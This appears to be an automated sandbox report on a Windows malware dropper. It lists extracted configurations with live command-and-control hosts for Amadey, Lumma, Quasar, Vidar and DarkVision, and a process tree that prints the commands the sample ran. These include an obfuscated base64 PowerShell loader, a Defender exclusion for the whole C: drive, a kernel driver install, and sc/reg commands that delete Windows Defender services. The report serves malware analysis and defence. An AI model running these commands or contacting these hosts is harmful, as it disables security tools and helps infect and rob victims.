Analysis

  • max time kernel
    116s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/04/2025, 07:42

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    86428a8e81fd73f31a5730758e8d90a6

  • SHA1

    499eab8ce96089bd54ef95693096525938b5c286

  • SHA256

    4facc56a1012801ac81d763f53d57c6c35ed4948945aa925df96cdaa30b1b90f

  • SHA512

    be10c0a63d32a64563ab36033da9fac85648693e95dcfe4d72ae2e339a6a257ac731ac545fbbd80091b15a4830ca36d32b53a8fc46239c228ec17e84df44b156

  • SSDEEP

    49152:uHyrY8pYiaext5gwu4niwDC+KWrsrj0prynVia3:udiaa5Nniwe+DrKgkB

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://ironloxp.live/aksdd

https://metalsyo.digital/opsa

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://gspacedbv.world/EKdlsk

https://1galxnetb.today/GsuIAo

https://3starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://xrfxcaseq.live/gspaz

https://jrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://6grxeasyw.digital/xxepw

https://ywmedici.top/noagis

https://cosmosyf.top/GOsznj

https://1targett.top/dsANGt

https://rodformi.run/aUosoz

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

C2

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

darkvision

C2

82.29.67.160

Attributes
  • url

    http://107.174.192.179/data/003

    https://grabify.link/ZATFQO

    http://107.174.192.179/clean

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Detect Vidar Stealer 25 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • VenomRAT 1 IoCs

    Detects VenomRAT.

  • Venomrat family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 20 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 3 IoCs
  • Executes dropped EXE 58 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 33 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 16 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 55 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 35 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 35 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2592
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:24564
    • C:\Users\Admin\AppData\Local\Temp\random.exe
      "C:\Users\Admin\AppData\Local\Temp\random.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3880
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe
          "C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:764
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4960
        • C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe
          "C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2076
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2044
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4016
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5324
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5432
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3784
        • C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe
          "C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2368
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 1148
              5⤵
              • Program crash
              PID:4248
        • C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe
          "C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1136
          • C:\Users\Admin\AppData\Local\Temp\261.exe
            "C:\Users\Admin\AppData\Local\Temp\261.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5252
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EF51.tmp\EF52.tmp\EF53.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1720
              • C:\Users\Admin\AppData\Local\Temp\261.exe
                "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5944
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EFEE.tmp\EFEF.tmp\EFF0.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                  7⤵
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:4700
                  • C:\Windows\system32\sc.exe
                    sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                    8⤵
                    • Launches sc.exe
                    PID:5488
                  • C:\Windows\system32\sc.exe
                    sc start ddrver
                    8⤵
                    • Launches sc.exe
                    PID:2392
                  • C:\Windows\system32\timeout.exe
                    timeout /t 1
                    8⤵
                    • Delays execution with timeout.exe
                    PID:4660
                  • C:\Windows\system32\sc.exe
                    sc stop ddrver
                    8⤵
                    • Launches sc.exe
                    PID:2152
                  • C:\Windows\system32\sc.exe
                    sc start ddrver
                    8⤵
                    • Launches sc.exe
                    PID:4948
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:4760
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:2192
                  • C:\Windows\system32\sc.exe
                    sc stop "WinDefend"
                    8⤵
                    • Launches sc.exe
                    PID:5240
                  • C:\Windows\system32\sc.exe
                    sc delete "WinDefend"
                    8⤵
                    • Launches sc.exe
                    PID:5384
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                    8⤵
                      PID:2244
                    • C:\Windows\system32\sc.exe
                      sc stop "MDCoreSvc"
                      8⤵
                      • Launches sc.exe
                      PID:4516
                    • C:\Windows\system32\sc.exe
                      sc delete "MDCoreSvc"
                      8⤵
                      • Launches sc.exe
                      PID:4680
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                      8⤵
                        PID:4632
                      • C:\Windows\system32\sc.exe
                        sc stop "WdNisSvc"
                        8⤵
                        • Launches sc.exe
                        PID:4540
                      • C:\Windows\system32\sc.exe
                        sc delete "WdNisSvc"
                        8⤵
                        • Launches sc.exe
                        PID:5840
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                        8⤵
                          PID:4752
                        • C:\Windows\system32\sc.exe
                          sc stop "Sense"
                          8⤵
                          • Launches sc.exe
                          PID:4932
                        • C:\Windows\system32\sc.exe
                          sc delete "Sense"
                          8⤵
                          • Launches sc.exe
                          PID:3648
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                          8⤵
                            PID:4968
                          • C:\Windows\system32\sc.exe
                            sc stop "wscsvc"
                            8⤵
                            • Launches sc.exe
                            PID:4904
                          • C:\Windows\system32\sc.exe
                            sc delete "wscsvc"
                            8⤵
                            • Launches sc.exe
                            PID:4928
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                            8⤵
                            • Modifies security service
                            PID:2700
                          • C:\Windows\system32\sc.exe
                            sc stop "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:1456
                          • C:\Windows\system32\sc.exe
                            sc delete "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:5700
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                            8⤵
                              PID:3956
                            • C:\Windows\system32\sc.exe
                              sc stop "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:2512
                            • C:\Windows\system32\sc.exe
                              sc delete "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:4960
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                              8⤵
                                PID:4424
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:5504
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:4612
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                8⤵
                                  PID:5536
                                • C:\Windows\system32\sc.exe
                                  sc stop "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:5540
                                • C:\Windows\system32\sc.exe
                                  sc delete "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:4604
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                  8⤵
                                    PID:4792
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:5032
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:5836
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                    8⤵
                                      PID:5568
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:1556
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:3056
